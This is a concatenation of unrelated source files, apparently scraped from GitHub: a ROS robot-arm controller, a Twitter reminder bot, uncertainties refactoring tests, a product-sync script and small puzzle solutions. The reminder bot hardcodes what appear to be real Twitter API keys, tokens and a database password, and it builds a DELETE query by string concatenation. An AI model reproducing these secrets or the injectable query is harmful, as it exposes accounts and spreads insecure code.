\"/link4\", \"/link5\", rospy.Time(0)\n )\n (self.trans[4], self.rot[4]) = self.listener.lookupTransform(\n \"/link5\", \"/link6\", rospy.Time(0)\n )\n (self.trans[5], self.rot[5]) = self.listener.lookupTransform(\n \"/link6\", \"/tcp\", rospy.Time(0)\n )\n break\n\n except (\n tf.LookupException,\n tf.ConnectivityException,\n tf.ExtrapolationException,\n ):\n continue\n\n # Build chain link1 to tcp\n self.chain.addSegment(\n Segment(\n Joint(Joint.RotZ),\n Frame(\n Rotation.Quaternion(0.5, 0.5, -0.5, 0.5),\n Vector(self.trans[0][0], self.trans[0][1], self.trans[0][2]),\n ),\n )\n )\n self.chain.addSegment(\n Segment(\n Joint(Joint.RotZ),\n Frame(\n Rotation.Quaternion(0, 0, 0, 1),\n Vector(self.trans[1][0], self.trans[1][1], self.trans[1][2]),\n ),\n )\n )\n self.chain.addSegment(\n Segment(\n Joint(Joint.RotZ),\n Frame(\n Rotation.Quaternion(-0.5, -0.5, 0.5, 0.5),\n Vector(self.trans[2][0], self.trans[2][1], self.trans[2][2]),\n ),\n )\n )\n self.chain.addSegment(\n Segment(\n Joint(Joint.RotZ),\n Frame(\n Rotation.Quaternion(0.5, 0.5, -0.5, 0.5),\n Vector(self.trans[3][0], self.trans[3][1], self.trans[3][2]),\n ),\n )\n )\n self.chain.addSegment(\n Segment(\n Joint(Joint.RotZ),\n Frame(\n Rotation.Quaternion(-0.5, -0.5, 0.5, 0.5),\n Vector(self.trans[4][0], self.trans[4][1], self.trans[4][2]),\n ),\n )\n )\n self.chain.addSegment(\n 
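# editor note: sixth and last segment, link6 -> tcp; identity rotation (quaternion 0,0,0,1) with the translation taken from the tf lookup above\n            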
Segment(\n Joint(Joint.RotZ),\n Frame(\n Rotation.Quaternion(0, 0, 0, 1),\n Vector(self.trans[5][0], self.trans[5][1], self.trans[5][2]),\n ),\n )\n )\n\n ######## solver to calc kinematics(fk/ik) ##################\n # self.fksolverpos = ChainFkSolverPos_recursive(self.chain)\n # self.iksolver1v = ChainIkSolverVel_pinv(self.chain)\n # self.iksolverpos = ChainIkSolverPos_NR(self.chain, self.fksolverpos, self.iksolver1v)\n\n ############## Solver ref###################################\n # self.jacsolver = ChainJntToJacSolver(self.chain)\n # self.jacdotsolver = ChainJntToJacDotSolver(self.chain)\n # self.fksolverpos = ChainFkSolverPos_recursive(self.chain)\n # self.fksolvervel = ChainFkSolverVel_recursive(self.chain)\n # self.iksolvervel = ChainIkSolverVel_pinv(self.chain)\n # self.iksolvervel_givens = ChainIkSolverVel_pinv_givens(self.chain)\n # self.iksolverpos = ChainIkSolverPos_NR(self.chain, self.fksolverpos, self.iksolvervel)\n # self.iksolverpos_givens = ChainIkSolverPos_NR(self.chain, self.fksolverpos, self.iksolvervel_givens)\n\n def move_seq(self):\n\n ROBOT = self.READY_STATE\n ROBOT = self.isReadyState(ROBOT)\n q_jnt = JntArray(self.chain.getNrOfJoints())\n\n job_check = True\n job_count = 0\n\n while job_check:\n\n if ROBOT == self.READY_STATE:\n q = way_point[job_count]\n q = degs2rads(q)\n\n for l, k in enumerate(q):\n q_jnt[l] = k\n\n for j in range(6):\n self.q_list.data[j] = q_jnt[j]\n\n print(self.q_list)\n self.jnt_pub.publish(self.q_list)\n\n ROBOT = self.MOVING\n job_count += 1\n\n ROBOT = self.isReadyState(ROBOT)\n\n if ROBOT == self.ERROR:\n print(\"Error!\")\n break\n\n if job_count > 15:\n # input_sig = True\n job_count = 0\n job_check = False\n\n if self.isshutdown:\n job_check = False\n\n def move_sig(self, sig):\n \"\"\"\n keyboard input guide\n\n w r\n a d\n x f\n\n\n Args :\n jointAngles : current joint values\n current_frame : current Frame value calculated fk using current joint angle value\n goal_frame : goal Frame\n q_jnt : goal joint angle value calculated ik using goal frame\n \"\"\"\n\n ROBOT = self.READY_STATE\n ROBOT = self.isReadyState(ROBOT)\n goal_frame = Frame()\n current_frame = Frame()\n q_jnt = JntArray(self.chain.getNrOfJoints())\n\n self.fksolverpos = ChainFkSolverPos_recursive(self.chain)\n self.iksolver1v = ChainIkSolverVel_pinv(self.chain)\n self.iksolverpos = ChainIkSolverPos_NR(\n self.chain, self.fksolverpos, self.iksolver1v\n )\n\n self.fksolverpos.JntToCart(self.jointAngles, current_frame)\n\n tmp_ROT = Rotation.GetRPY(current_frame.M)\n\n ######## print for check #########\n\n print(\" \")\n print(\"current joint angle\")\n print(self.jointAngles)\n print(\"current frame\")\n print(current_frame)\n print(\"#####################\")\n\n ######## print for check end #####\n\n if sig == \"0\":\n q = [0, 0, 0, 0, 0, 0]\n q = degs2rads(q)\n\n for l, k in enumerate(q):\n q_jnt[l] = k\n\n ######################## VECTOR #########################\n # 0.1 => 0.1m\n # vector x + 0.1\n elif sig == \"w\":\n goal_frame = Frame(\n current_frame.M,\n Vector(\n current_frame.p[0] + 0.1, current_frame.p[1], current_frame.p[2]\n ),\n )\n self.iksolverpos.CartToJnt(self.jointAngles, goal_frame, q_jnt)\n # vector x - 0.1\n elif sig == \"x\":\n goal_frame = Frame(\n current_frame.M,\n Vector(\n current_frame.p[0] - 0.1, current_frame.p[1], current_frame.p[2]\n ),\n )\n self.iksolverpos.CartToJnt(self.jointAngles, goal_frame, q_jnt)\n # vector y + 0.1\n elif sig == \"a\":\n goal_frame = Frame(\n current_frame.M,\n Vector(\n current_frame.p[0], 
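# editor note: per the docstring above, 0.1 here means 0.1 m; x and z stay fixed while y is shifted\n                    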
current_frame.p[1] + 0.1, current_frame.p[2]\n ),\n )\n self.iksolverpos.CartToJnt(self.jointAngles, goal_frame, q_jnt)\n # vector y - 0.1\n elif sig == \"d\":\n goal_frame = Frame(\n current_frame.M,\n Vector(\n current_frame.p[0], current_frame.p[1] - 0.1, current_frame.p[2]\n ),\n )\n self.iksolverpos.CartToJnt(self.jointAngles, goal_frame, q_jnt)\n # vector z + 0.1\n elif sig == \"r\":\n goal_frame = Frame(\n current_frame.M,\n Vector(\n current_frame.p[0], current_frame.p[1], current_frame.p[2] + 0.1\n ),\n )\n self.iksolverpos.CartToJnt(self.jointAngles, goal_frame, q_jnt)\n # vector z - 0.1\n elif sig == \"f\":\n goal_frame = Frame(\n current_frame.M,\n Vector(\n current_frame.p[0], current_frame.p[1], current_frame.p[2] - 0.1\n ),\n )\n self.iksolverpos.CartToJnt(self.jointAngles, goal_frame, q_jnt)\n tmp_ROT = Rotation.GetRPY(current_frame.M)\n ######################## VECTOR end #####################\n\n ######################## ROTATION #######################\n # 0.1 => 17 deg\n elif sig == \"y\":\n goal_frame = Frame(\n Rotation.RPY(tmp_ROT[0] + 0.1, tmp_ROT[1], tmp_ROT[2]), current_frame.p\n )\n self.iksolverpos.CartToJnt(self.jointAngles, goal_frame, q_jnt)\n elif sig == \"u\":\n goal_frame = Frame(\n Rotation.RPY(tmp_ROT[0] - 0.1, tmp_ROT[1], tmp_ROT[2]), current_frame.p\n )\n self.iksolverpos.CartToJnt(self.jointAngles, goal_frame, q_jnt)\n elif sig == \"g\":\n goal_frame = Frame(\n Rotation.RPY(tmp_ROT[0], tmp_ROT[1] + 0.1, tmp_ROT[2]), current_frame.p\n )\n self.iksolverpos.CartToJnt(self.jointAngles, goal_frame, q_jnt)\n elif sig == \"h\":\n goal_frame = Frame(\n Rotation.RPY(tmp_ROT[0], tmp_ROT[1] - 0.1, tmp_ROT[2]), current_frame.p\n )\n self.iksolverpos.CartToJnt(self.jointAngles, goal_frame, q_jnt)\n elif sig == \"b\":\n goal_frame = Frame(\n Rotation.RPY(tmp_ROT[0], tmp_ROT[1], tmp_ROT[2] + 0.1), current_frame.p\n )\n self.iksolverpos.CartToJnt(self.jointAngles, goal_frame, q_jnt)\n elif sig == \"n\":\n goal_frame = Frame(\n Rotation.RPY(tmp_ROT[0], tmp_ROT[1], tmp_ROT[2] - 0.1), current_frame.p\n )\n self.iksolverpos.CartToJnt(self.jointAngles, goal_frame, q_jnt)\n ######################## ROTATION end ###################\n\n ########## test #########################################\n\n elif sig == \"j\":\n goal_frame = Frame(current_frame.M, Vector(0.3, 0.3, 0.5))\n self.iksolverpos.CartToJnt(self.jointAngles, goal_frame, q_jnt)\n elif sig == \"k\":\n goal_frame = Frame(current_frame.M, Vector(0.3, -0.3, 0.5))\n self.iksolverpos.CartToJnt(self.jointAngles, goal_frame, q_jnt)\n elif sig == \"l\":\n goal_frame = Frame(current_frame.M, Vector(0.13, 0.756, 0.568))\n self.iksolverpos.CartToJnt(self.jointAngles, goal_frame, q_jnt)\n\n ########## test end #####################################\n\n else:\n _input = int(self.go_sign) - 1\n\n if _input > 15:\n print(\"input ERROR! 
please enter num again(1~16)\")\n else:\n q = way_point[_input]\n q = degs2rads(q)\n\n for l, k in enumerate(q):\n q_jnt[l] = k\n\n for j in range(6):\n tmp_q = q_jnt[j] // math.pi\n tmp_r = q_jnt[j] % math.pi\n\n if tmp_q % 2:\n self.q_list.data[j] = tmp_r - math.pi\n\n else:\n self.q_list.data[j] = tmp_r\n\n self.jnt_pub.publish(self.q_list)\n\n # if ROBOT == self.READY_STATE:\n # print(self.q_list)\n # self.jnt_pub.publish(self.q_list)\n\n ######## print for check #########\n\n print(\"goal joint angle\")\n print(self.q_list.data)\n print(\"goal frame\")\n print(goal_frame)\n print(\"#####################\")\n\n # print(\"ROT\")\n # # print(current_frame.M.GetQuaternion())\n # print(current_frame.M.GetRPY())\n # print(\"Vector\")\n # print(current_frame.p)\n\n ######## print for check end ######\n\n # Subscriber callback funcs\n def status_callback(self, data):\n self.isstatus = data\n # print(self.isstatus.status_list[0].status, end=' : ')\n # print(self.isstatus.status_list[0].text)\n self.ready = self.isstatus.status_list[0].status\n\n # current joint value(rad)\n def joint_callback(self, jnt):\n for i in range(6):\n self.jointAngles[i] = jnt.position[i]\n\n # get user command\n def msg_callback(self, cmd_msg):\n self.go_sign = cmd_msg.data\n\n if self.go_sign == \"p\":\n self.move_seq()\n elif self.go_sign == \"s\":\n self.stop_pub.publish(True)\n elif self.go_sign == \"q\":\n self.isshutdown = True\n self.node_shutdown_pub.publish(True)\n else:\n self.move_sig(self.go_sign)\n\n # get goal point frame and pub goal joint values\n def get_point_cb(self, fr_data):\n q_jnt = JntArray(self.chain.getNrOfJoints())\n self.iksolverpos.CartToJnt(self.jointAngles, fr_data, q_jnt)\n self.jnt_pub.publish(q_jnt)\n\n def stop(self):\n self.stop_pub.publish(True)\n\n # Robot status func\n def isReadyState(self, ROBOT):\n \"\"\"ROBOT status check and convert\n\n Args:\n self.ready : current robot status (1:ready, 2:busy, 3:direct teaching)\n self.READY_STATE : when robot can get joint value and move\n self.BUSY_STATE : when robot moving\n self.MOVING : when controller give joint value to robot\n self.ERROR : occurs error\n\n Returns:\n robot state (compared with previous state)\n\n Raises:\n RobotError: If robot status is error status.\n \"\"\"\n\n # ROBOT start moving\n if ROBOT == self.MOVING:\n if self.ready == 0:\n return ROBOT\n elif self.ready == 1:\n ROBOT = self.BUSY_STATE\n return ROBOT\n else:\n print(\"CAN NOT MOVING!\")\n return self.ERROR\n\n # ROBOT moving...\n elif ROBOT == self.BUSY_STATE:\n if self.ready == 1:\n return ROBOT\n elif self.ready == 0:\n ROBOT = self.READY_STATE\n return ROBOT\n else:\n print(\"CAN NOT MOVING!\")\n return self.ERROR\n\n else:\n ROBOT = self.READY_STATE\n return ROBOT\n\n\ndef main():\n\n app = TaskControllerApp()\n\n while not rospy.is_shutdown():\n if app.isshutdown:\n break\n\n # rospy.spin()\n\n\nif __name__ == \"__main__\":\n try:\n main()\n except rospy.ROSInterruptException:\n pass\n","repo_name":"1Gyu1/ros-noetic","sub_path":"ros-noetic-pkgs/controll_robots/scripts/examples/indy/indy_task_controller.py","file_name":"indy_task_controller.py","file_ext":"py","file_size_in_byte":17939,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"20447939750","text":"\"\"\"\n@author Barnabas Vizy\nInserts a tweet_obj into the MySQL database.\nTo config the database:\n > CREATE TABLE reminders(\n -> sender varchar(15) NOT NULL,\n -> hour INT NOT NULL,\n -> minute INT NOT NULL,\n -> period varchar(4) NOT 
NULL,\n -> time_zone varchar(20) NOT NULL,\n -> month tinyint NOT NULL,\n -> day tinyint NOT NULL,\n -> msg varchar(123) NOT NULL,\n -> following bit NOT NULL);\n\"\"\"\n\nimport pymysql\nfrom twitter import Twitter, OAuth\nfrom datetime import *\nimport time\nfrom error import update_log\nfrom random import randint\n\n\nauth = OAuth(\n consumer_key='2CE1E6U7odFK1MFWeCnOPIh5R',\n consumer_secret='SqqWIvcMGdLbwAqu2oSBzsCr4379aSITLy4AsA9HZyPQxYqCl6',\n token='796842527487889409-hY298XB4dZGxBLU2blhpCVMz14UPQo8',\n token_secret='E9CmwGNpDNffxzU7NjuXernjofYSEF6RyjEKiVantXJap'\n)\n# auth = OAuth( # keys for reminderbot002@gmail.com , secondary test account with same login\n# consumer_key='PfV0xdYWs55kstAO4PHF1kIHt',\n# consumer_secret='wYtyvj7EaHBWftLCR8sfYBJKQISu4PhhWszIuLACo0I4jqBgAi',\n# token='792039779068157952-HxKthF9JlcGtDYEiHfT1bn456tJKNLE',\n# token_secret='Fl24QTmnau3vQB3svxDBnepwTL4ifGHvLJVD52PXKXh99'\n# )\n\nt = Twitter(auth=auth)\n\nwhile (1<2):\n conn = pymysql.connect(host='localhost', user='root', passwd='thisisthepassword', db='thereminderbot')\n cursor = conn.cursor()\n # query for selecting ALL table records\n query = (\"SELECT SENDER, HOUR, MINUTE, PERIOD, TIME_ZONE, MONTH, DAY, MSG, FOLLOWING FROM reminders \")\n # cursor is now full table\n cursor.execute(query)\n print(\"Checking DB...\")\n # for every element in table, do any of the times match\n # if they do, send tweet to user with message\n for (SENDER, HOUR, MINUTE, PERIOD, TIME_ZONE, MONTH, DAY, MSG, FOLLOWING) in cursor:\n\n tweet_string = \"Hey @\" + SENDER + \" - \" + MSG + \" - \" + str(randint(1000, 9999))\n timeEST = datetime.now()\n\n militarytimefix = 0\n if(PERIOD == \"PM\"):\n militarytimefix = 12\n\n newtime = timeEST.hour-militarytimefix\n if newtime < 0 :\n newtime = timeEST.hour\n\n current_time = datetime(timeEST.year, timeEST.month, timeEST.day, newtime, timeEST.minute, 0)\n #print(\"HOUR:\"+str(HOUR)+\", MIN: \"+str(MINUTE)+\", MONTH:\"+str(MONTH)+\", DAY: \"+str(DAY)+\", \"+str(current_time))\n if MONTH == timeEST.month and DAY == current_time.day and HOUR == current_time.hour and MINUTE == timeEST.minute:\n print(\"SENDER: {0}, HOUR: {1}, MINUTE: {2}, PERIOD: {3}, TIME_ZONE: {4}, MONTH: {5}, DAY: {6}, MSG: {7}, FOLLOWING: {8}\".format(SENDER, HOUR, MINUTE, PERIOD, TIME_ZONE, MONTH, DAY, MSG, FOLLOWING))\n #use twitter connection to send reminder\n t.statuses.update(status=str(tweet_string))\n update_log(SENDER, \"Reminder completed\")\n #remove all reminders by user after successful expiration of most recent reminder\n cursor.execute(\"DELETE FROM reminders WHERE sender = '\"+SENDER+\"'\")\n #commiting changes to db is absolutely essential\n conn.commit()\n time.sleep(1.0) #wait a second so we don't send out a million tweets at once\n continue\n\n time.sleep(60.0)\n conn.close()\n cursor.close()","repo_name":"botronico/the-reminder-bot","sub_path":"thereminderbot/database.py","file_name":"database.py","file_ext":"py","file_size_in_byte":3256,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"27984943083","text":"#!/usr/bin/env python\n\n'''\nUnit tests for the uncertainties.lib1to2 code update package.\n\nMeant to be run through nosetests.\n\n(c) 2013-2020 by Eric O. LEBIGOT (EOL).\n'''\n\n# Code inspired by:\n#\n# - lib2to3.tests.test_fixers.py\n\nfrom builtins import str\nimport sys\nimport os\n\n# !! 
Would it be possible to use an import hook so as to stop the\n# import if the Python version is not high enough, instead of having\n# like here a whole indented block?\n\n\nif sys.version_info < (2, 7) or \"TRAVIS\" in os.environ or \"APPVEYOR\" in os.environ:\n \n # This package uses lib2to3, which requires Python 2.6+.\n \n # lib2to3.tests.support is missing from 2.7.3 Travis Python packages.\n\n # !! Nosetests for Python 2.6 also fails (it looks like it tries\n # to run tests via lib2to3/tests/test_refactor.py):\n \n pass\n\nelse:\n\n import os\n try:\n # lib2to3 test support seems to have moved to a new place in 2013:\n import test.test_lib2to3.support as support\n except ImportError:\n # Pre-~2013 path for lib2to3 test support\n import lib2to3.tests.support as support\n\n # The lib1to2.fixes package given to lib2to3 is the *local* package\n # (not to another installed module). This is important for the\n # __import__() used via support.get_refactorer().\n sys.path.insert(0, os.path.join(os.path.dirname(__file__), os.pardir))\n\n def check_refactor(refactorer, source, expected):\n \"\"\"\n Raises an AssertionError if the given\n lib2to3.refactor.RefactoringTool does not refactor 'source' into\n 'expected'.\n\n source, expected -- strings (typically with Python code).\n \"\"\"\n\n # !! str() is from future's builtins and is only needed for Python 2,\n # where it is mostly equivalent to unicode():\n new = str(\n refactorer.refactor_string(support.reformat(source), ''))\n\n assert support.reformat(expected) == new, (\n \"Refactoring failed: '{}' => '{}' instead of '{}'\".format(\n source, new.strip(), expected))\n\n # print 'Checked:', source, '=>', expected\n \n def check_all(fixer, tests):\n '''\n Takes a fixer name (module from fixes) and a mapping that maps\n code using the obsolete syntax into updated code, and checks\n whether the code is correctly updated.\n ''' \n\n refactorer = support.get_refactorer(\n fixer_pkg='lib1to2', fixers=[fixer])\n\n for (input_str, out_str) in tests.items():\n check_refactor(refactorer, input_str, out_str)\n\n def test_fix_std_dev():\n 'Tests the transformation of std_dev() into std_dev.'\n\n\n tests = {\n 'x.std_dev()': 'x.std_dev',\n 'y.std_dev(); unc.std_dev(z)': 'y.std_dev; unc.std_dev(z)',\n 'uncertainties.std_dev(x)': 'uncertainties.std_dev(x)',\n 'std_dev(x)': 'std_dev(x)',\n 'obj.x.std_dev()': 'obj.x.std_dev',\n\n \"\"\"\n long_name.std_dev(\n # No argument!\n )\"\"\":\n \"\"\"\n long_name.std_dev\"\"\",\n\n # set_std_dev => .std_dev:\n 'x.set_std_dev(3)': 'x.std_dev = 3',\n 'y = set_std_dev(3)': 'y = set_std_dev(3)', # None\n 'func = x.set_std_dev': 'func = x.set_std_dev',\n 'obj.x.set_std_dev(sin(y))': 'obj.x.std_dev = sin(y)'\n }\n\n check_all('std_dev', tests)\n\n def test_ufloat():\n '''\n Test of the transformation of ufloat(tuple,...) and\n ufloat(string,...) 
into ufloat(nominal_value, std_dev, tag=...).\n '''\n\n tests = {\n # Tuples:\n 'ufloat((3, 0.14))': 'ufloat(3, 0.14)',\n 'ufloat((3, 0.14), \"pi\")': 'ufloat(3, 0.14, \"pi\")',\n \"ufloat((3, 0.14), 'pi')\": \"ufloat(3, 0.14, 'pi')\",\n \"x = ufloat((3, 0.14), tag='pi')\": \"x = ufloat(3, 0.14, tag='pi')\",\n\n # Simple expressions that can be transformed:\n 'ufloat((n, s), tag=\"var\")': 'ufloat(n, s, tag=\"var\")',\n\n # Simple expressions that cannot be transformed automatically:\n 'ufloat(str_repr, tag=\"var\")': 'ufloat(str_repr, tag=\"var\")',\n 'ufloat(*tuple_repr, tag=\"var\")': 'ufloat(*tuple_repr, tag=\"var\")',\n 'ufloat(*t[0, 0])': 'ufloat(*t[0, 0])', \n\n # Strings:\n 'ufloat(\"-1.23(3.4)\")': 'ufloat_fromstr(\"-1.23(3.4)\")',\n \"ufloat('-1.23(3.4)')\": \"ufloat_fromstr('-1.23(3.4)')\",\n 'ufloat(\"-1.23(3.4)\", \"var\")':\n 'ufloat_fromstr(\"-1.23(3.4)\", \"var\")',\n 'ufloat(\"-1.23(3.4)\", tag=\"var\")':\n 'ufloat_fromstr(\"-1.23(3.4)\", tag=\"var\")'\n\n }\n\n # Automatic addition of a dotted access:\n tests.update(dict(\n # !! Dictionary comprehension usable with Python 2.7+\n (orig.replace('ufloat', 'unc.ufloat'),\n new.replace('ufloat', 'unc.ufloat'))\n for (orig, new) in tests.items()))\n\n # Test for space consistency:\n tests[' t = u.ufloat(\"3\")'] = ' t = u.ufloat_fromstr(\"3\")'\n\n # Exponentiation test:\n tests.update(dict(\n # !! Dictionary comprehension usable with Python 2.7+\n (orig+'**2', new+'**2')\n for (orig, new) in tests.items()))\n\n # Exponent test:\n tests['2**ufloat(\"3\")'] = '2**ufloat_fromstr(\"3\")'\n\n # Opposite test:\n tests['-ufloat(\"3\")'] = '-ufloat_fromstr(\"3\")'\n\n check_all('ufloat', tests)\n\n def test_uarray_umatrix():\n '''\n Test of the transformation of uarray(tuple,...) into\n uarray(nominal_values, std_devs). Also performs the same tests\n on umatrix().\n '''\n \n tests = {\n 'uarray((arange(3), std_devs))': 'uarray(arange(3), std_devs)',\n 'uarray(tuple_arg)': 'uarray(*tuple_arg)',\n # Unmodified, correct code:\n 'uarray(values, std_devs)': 'uarray(values, std_devs)',\n # Spaces tests:\n 'uarray( ( arange(3), std_devs ) ) ':\n 'uarray( arange(3), std_devs) ',\n 'uarray( tuple_arg )': 'uarray(* tuple_arg)'\n\n }\n\n # Automatic addition of a dotted access:\n tests.update(dict(\n # !! Dictionary comprehension usable with Python 2.7+\n (orig.replace('uarray', 'un.uarray'),\n new.replace('uarray', 'un.uarray'))\n for (orig, new) in tests.items()))\n \n # Exponentiation test:\n tests.update(dict(\n # !! 
Dictionary comprehension usable with Python 2.7+\n (orig+'**2', new+'**2')\n for (orig, new) in tests.items()))\n\n # Test for space consistency:\n tests[' t = u.uarray(args)'] = ' t = u.uarray(*args)'\n\n # Same tests, but for umatrix:\n tests.update(dict(\n (orig.replace('uarray', 'umatrix'),\n new.replace('uarray', 'umatrix'))\n for (orig, new) in tests.items()))\n \n check_all('uarray_umatrix', tests)\n\n","repo_name":"lebigot/uncertainties","sub_path":"uncertainties/lib1to2/test_1to2.py","file_name":"test_1to2.py","file_ext":"py","file_size_in_byte":7058,"program_lang":"python","lang":"en","doc_type":"code","stars":489,"dataset":"github-code","pt":"61"} +{"seq_id":"13441875040","text":"import requests\nimport json\nimport pymysql\n#import datetime\nfrom datetime import datetime\nfrom datetime import timedelta, date\n\ndef getColumnNames(tableName):\n\n # MySQL Server credentials\n db = pymysql.connect(\"0.0.0.0\",\"user\",\"xxx\",\"Invoices\")\n cursor = db.cursor()\n\n lQuery = \"describe {0};\".format(tableName)\n\n rowsCount=cursor.execute(lQuery)\n\n returnData = []\n for data in cursor.fetchall():\n if (data[0]!='aplicaPrecioUnico' and data[0]!='precioUnico'):\n returnData.append(data[0])\n\n db.close()\n\n #print(returnData)\n\n return returnData\n\ndef obtenerIdLocal(idGlobal):\n\n # MySQL Server credentials\n db = pymysql.connect(\"0.0.0.0\",\"user\",\"xxx\",\"Invoices\")\n cursor = db.cursor()\n\n lQuery = \"select idLocal from catArticulosNube where idNube = {0}\".format(idGlobal)\n\n #print(lQuery)\n\n rowsCount=cursor.execute(lQuery)\n\n returnData = []\n for data in cursor.fetchall():\n returnData.append(data[0])\n\n db.close()\n\n #print(returnData)\n\n return returnData\n\n\ndef actualizarRegistro(querySQL, params):\n\n # MySQL Server credentials\n db = pymysql.connect(\"0.0.0.0\",\"user\",\"xxx\",\"Invoices\" )\n cursor = db.cursor()\n\n rowsCount=cursor.execute(querySQL, params)\n\n db.commit()\n db.close()\n\n print(\"Registros actualizados {0}\".format(rowsCount))\n\n return rowsCount\n\ndef insertarRegistro(sentenciaSQL, params):\n\n # MySQL Server credentials\n db = pymysql.connect(\"0.0.0.0\",\"user\",\"xxx\",\"Invoices\" )\n cursor = db.cursor()\n\n rowsCount=cursor.execute(sentenciaSQL, params)\n\n idInserted=cursor.lastrowid\n\n db.commit()\n db.close()\n\n return idInserted\n\n\n#mysql> describe catArticulosNube;\n#+-----------------+----------+------+-----+---------+-------+\n#| Field | Type | Null | Key | Default | Extra |\n#+-----------------+----------+------+-----+---------+-------+\n#| idNube | int(11) | NO | PRI | NULL | |\n#| idLocal | int(11) | NO | PRI | NULL | |\n#| dtFechaAct | datetime | NO | | NULL | |\n#| dtFechaDownload | datetime | NO | | NULL | |\n#+-----------------+----------+------+-----+---------+-------+\n#4 rows in set (0.00 sec)\n\nif __name__ == '__main__':\n\n with open('prodConf.json') as json_file:\n confProd = json.load(json_file)\n\n idTienda=confProd[\"idTienda\"]\n\n x = datetime.now()\n nombreLog = \"./{0}_{1}_{2}_{3}_{4}_{5}.log\".format(x.strftime(\"%Y\"), x.strftime(\"%m\"), x.strftime(\"%d\"), x.strftime(\"%H\"), x.strftime(\"%M\"), x.strftime(\"%S\"))\n \n print(nombreLog)\n fp = open(nombreLog, 'w')\n\n colNames = getColumnNames('catProductos')\n\n r = requests.get('http://45.55.248.209:5002/productos/{0}'.format(idTienda))\n jsonResponse = r.json()\n\n totalReg=0\n wentOK = True\n dtRegModificado = datetime.strptime(\"2021-01-01 00:00:00\", '%Y-%m-%d %H:%M:%S')\n for producto in jsonResponse:\n totalReg = totalReg + 
1\n primero = True\n updateSQL = \"update catProductos SET \";\n insertSQL = \"insert into catProductos(\"\n insertVSQL = \" values(\"\n prodData = []\n\n if datetime.strptime(producto[\"dtRegModificado\"], '%Y-%m-%d %H:%M:%S') > dtRegModificado:\n dtRegModificado = datetime.strptime(producto[\"dtRegModificado\"], '%Y-%m-%d %H:%M:%S') \n\n for colN in colNames:\n\n if colN!=\"IdProducto\":\n\n if primero==False:\n updateSQL = (updateSQL + \",\")\n insertSQL = (insertSQL + \",\")\n insertVSQL = (insertVSQL + \",\")\n\n primero=False\n\n updateSQL = updateSQL + colN + \" = %s\"\n insertSQL = insertSQL + colN\n insertVSQL = insertVSQL + \"%s\"\n \n value = producto[colN]\n if str(type(value))==\"\":\n prodData.append(value.encode('ascii', 'ignore').decode('ascii'))\n else:\n prodData.append(value)\n\n idProdArr = obtenerIdLocal(producto[\"IdProducto\"])\n if len(idProdArr) > 0:\n print(\"Actualizar {0}...\".format(idProdArr[0]))\n fp.write(\"Actualizar {0}...\\n\".format(idProdArr[0]))\n prodData.append(idProdArr[0])\n updateSQL = updateSQL + \" where idProducto = %s;\"\n #print(updateSQL)\n if actualizarRegistro(updateSQL, prodData) < 1:\n print(\"No se actualizo\")\n fp.write(\"No se actualizo\\n\")\n #wentOK=False\n else:\n print(\"Insertar {0}...\".format(producto[\"IdProducto\"]))\n fp.write(\"Insertar {0}...\\n\".format(producto[\"IdProducto\"]))\n insertSQL = insertSQL + \") \" + insertVSQL + \");\";\n #print(insertSQL)\n nuevoId=insertarRegistro(insertSQL, prodData)\n insertNubeRef=\"insert into catArticulosNube(idNube, idLocal, dtFechaAct, dtFechaDownload) values(%s, %s, NOW(), NOW());\";\n paramsNube = []\n paramsNube.append(producto[\"IdProducto\"]) \n paramsNube.append(nuevoId)\n fp.write(\"nuevo id {0}\".format(nuevoId))\n print(\"nuevo id {0}\\n\".format(nuevoId))\n if actualizarRegistro(insertNubeRef, paramsNube) < 1:\n print(\"No se inserto\")\n fp.write(\"No se inserto\\n\")\n wentOK=False\n\n if wentOK == True:\n print(\"Actualuzacion completada exitosamene...\")\n fp.write(\"Actualizacion completada exitosamente\\n\")\n if totalReg > 0:\n print(dtRegModificado)\n resultEnd=requests.get('http://45.55.248.209:5002/productos/actualizacion/{0}/{1}'.format(idTienda,dtRegModificado))\n print('http://45.55.248.209:5002/productos/actualizacion/{0}/{1}'.format(idTienda,dtRegModificado))\n print(resultEnd)\n else:\n print(\"Actualuzacion completada con errores...\")\n fp.write(\"Actualizacion completada con errores\\n\")\n\n fp.close()\n","repo_name":"miguel-mota-gonzalez/ipcPOS","sub_path":"actualizarProductos.py","file_name":"actualizarProductos.py","file_ext":"py","file_size_in_byte":5998,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"34076063476","text":"\r\nd = int(input())\r\nhouses = [[i[0], int(i[1:])] for i in input().split(', ')[1:]]\r\nodd = [i for i in houses if i[1] % 2]\r\neven = [i for i in houses if i[1] % 2 == 0]\r\n\r\nfor delivery in range(d):\r\n inp = input().split(', ')[1:]\r\n odd += [[i[0], int(i[1:])] for i in inp[:-2] if int(i[1:]) % 2]\r\n odd.sort()\r\n even += [[i[0], int(i[1:])] for i in inp[:-2] if int(i[1:]) % 2 == 0]\r\n even.sort()\r\n if int(inp[-1]) <= len(odd):\r\n for i in range(len(odd)):\r\n if ord(odd[i][0]) >= ord(inp[-2]):\r\n print(''.join([str(i) for i in odd[(i + int(inp[-1]) - 1) % len(odd)]]))\r\n break\r\n else:\r\n for i in range(len(even)):\r\n if ord(even[i][0]) >= ord(inp[-2]):\r\n print(''.join([str(i) for i in even[(i + int(inp[-1]) - 1 - len(odd)) % 
len(even)]]))\r\n break\r\n","repo_name":"dolphin2025/ACSL","sub_path":"Other/Mail Delivery.py","file_name":"Mail Delivery.py","file_ext":"py","file_size_in_byte":861,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"7072619468","text":"# Count the one and three chain links\n\nimport re\nimport pprint\n\npp = pprint.PrettyPrinter(indent=4)\n\nwith open('input1.txt', 'r') as input:\n instructions = [line.strip() for line in input.readlines()]\n\nfield_pattern = r'''(.*): (\\d*)-(\\d*) or (\\d*)-(\\d*)'''\nfield_rules = {}\nindex = 0\n\n# Fields\nwhile instructions[index] != '':\n rule = re.match(field_pattern, instructions[index]).groups()\n\n field = rule[0]\n\n min1 = int(rule[1])\n max1 = int(rule[2])\n\n min2 = int(rule[3])\n max2 = int(rule[4])\n\n field_rules[field] = {\n 'min1': min1,\n 'max1': max1,\n 'min2': min2,\n 'max2': max2\n }\n\n index += 1\n\nprint('MIN MAXES:')\nprint(field_rules)\n\n# My Ticket\nindex += 2\nmy_ticket = 